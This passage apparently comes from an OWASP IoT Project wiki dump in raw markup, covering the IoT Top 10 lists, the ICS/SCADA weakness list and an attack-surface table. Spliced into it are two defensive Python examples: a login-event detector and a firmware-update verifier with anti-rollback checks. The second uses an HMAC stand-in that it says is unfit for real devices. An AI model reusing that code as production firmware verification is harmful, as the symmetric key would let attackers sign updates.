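            # Keep only attempts that fall inside the rate window.
            window[:] = [t for t in window if rec["ts"] - t <= RATE_WINDOW]
            if len(window) == RATE_THRESHOLD:
                events.append(("Authentication Exceptions",
                               "High Rate of Login Attempts", rec["src"]))

            if rec.get("result") == "fail":
                failed_by_user[rec["user"]] += 1
                if failed_by_user[rec["user"]] == FAILED_PASSWORD_THRESHOLD:
                    events.append(("Authentication Exceptions",
                                   "Multiple Failed Passwords", rec["user"]))
            elif rec.get("result") == "success" and rec.get("cred") == "default":
                # The device is assumed to flag a login made with factory credentials.
                events.append(("Administrative Mode Events",
                               "Device Accessed Using Default Administrative Credentials",
                               rec["user"]))

        elif "device" in rec and rec["device"] not in enrolled:
            events.append(("Ecosystem Membership Exceptions",
                           "Traffic Seen from Unenrolled System", rec["device"]))

    return events


if __name__ == "__main__":
    for category, event, subject in detect_events(SAMPLE_LOG):
        print(f"[{category}] {event}: {subject}")
```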
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to provide input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco, April 21, 2015: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project], Daniel Miessler, Practice Principal<br />
* Defcon 23, August 6-9, 2015: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping], Daniel Miessler<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman
https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246186 OWASP Internet of Things Project 2018-12-19T23:54:34Z
<p>Aaron.guzman: /* Contributors */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon this work, distribute the resulting work only under the same or a similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vishruta Rudresh<br />
* Vijayamurugan Pushpanathan<br />
* Aaron Guzman<br />
* Alexander Lafrenz<br />
* Masahiro Murashima<br />
* Charlie Worrell<br />
* José A. Rivas (jarv)<br />
* Pablo Endres<br />
* Ade Yoseman<br />
* Cédric LEVY-BENCHETON<br />
* Jason Andress<br />
* Amélie Didion (Designer)<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the known attacks that apply to them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Blocking of device firmware OTA updates (keeps the device on a vulnerable version)<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static key for encryption and decryption, shared across all devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
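The "Update Mechanism" rows above (unsigned updates, missing verification and authentication, malicious updates) together with the "Firmware downgrade possibility" item under Device Firmware describe what a device must check before flashing an image. The following Python block is an added example, not code from the OWASP project or from any vendor: a signed manifest carrying the version and image digest, and a device-side check that rejects forged signatures, tampered images, replays and downgrades. The keys, version numbers and image bytes are constructed, and the signature primitive is HMAC-SHA256 as a standard-library stand-in only; a real device must verify an asymmetric signature (Ed25519, ECDSA or RSA) with a public key, because a symmetric key recoverable from device memory or firmware (see the rows above) would let anyone sign an update.<br />
<br />
```python
"""Firmware update verification: signature, image digest and anti-rollback.

Added example (not OWASP project code). Everything below is constructed:
the signing key, the version numbers and the image bytes. HMAC-SHA256
stands in for the manifest signature so the block runs on the standard
library alone; a real device verifies an asymmetric signature with a
public key, since a symmetric key extractable from flash lets an attacker
sign updates.
"""
import hashlib
import hmac
import json

SIGNING_KEY = b"constructed-demo-signing-key"   # assumption: lives only on the vendor build system


def sign_update(image: bytes, version: int, key: bytes = SIGNING_KEY) -> dict:
    """Vendor side: produce a package {manifest, sig} for an image.

    The manifest binds the version counter to the image digest, and the
    signature covers the whole manifest, so neither field can be altered
    without invalidating the signature.
    """
    manifest = {"version": version, "sha256": hashlib.sha256(image).hexdigest()}
    payload = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return {"manifest": manifest, "sig": hmac.new(key, payload, "sha256").hexdigest()}


class Device:
    """Device side: holds the verification key and the anti-rollback counter."""

    def __init__(self, installed_version: int, key: bytes = SIGNING_KEY):
        # On real hardware the installed version lives in monotonic/protected
        # storage so a reset or re-flash cannot wind it back.
        self.installed_version = installed_version
        self.key = key
        self.image = None

    def apply_update(self, package: dict, image: bytes) -> str:
        """Return 'installed' or a 'rejected: ...' reason; installs only on success."""
        manifest = package.get("manifest", {})
        payload = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
        expected = hmac.new(self.key, payload, "sha256").hexdigest()
        # 1. Authenticity: nothing in the manifest is trusted before this check.
        if not hmac.compare_digest(expected, str(package.get("sig", ""))):
            return "rejected: bad signature"
        # 2. Integrity: the image delivered must be the one the manifest describes.
        if hashlib.sha256(image).hexdigest() != manifest.get("sha256"):
            return "rejected: image digest mismatch"
        # 3. Anti-rollback: a replayed or older (but validly signed) package is refused.
        if manifest.get("version", -1) <= self.installed_version:
            return "rejected: downgrade or replay"
        self.image = image
        self.installed_version = manifest["version"]
        return "installed"


if __name__ == "__main__":
    dev = Device(installed_version=1)
    v2 = sign_update(b"firmware-v2", 2)
    print(dev.apply_update(v2, b"firmware-v2"))          # installed
    print(dev.apply_update(v2, b"firmware-v2"))          # rejected: downgrade or replay
    print(dev.apply_update(v2, b"firmware-v2-trojan"))   # rejected: image digest mismatch
    forged = sign_update(b"firmware-v9", 9, key=b"attacker-key")
    print(dev.apply_update(forged, b"firmware-v9"))      # rejected: bad signature
```
<br />
The order of the three checks matters: the signature is verified before any manifest field is read, the digest is compared before the version, and the counter is only advanced after the image has been accepted, so a package that fails any step leaves the device state untouched.<br />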
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
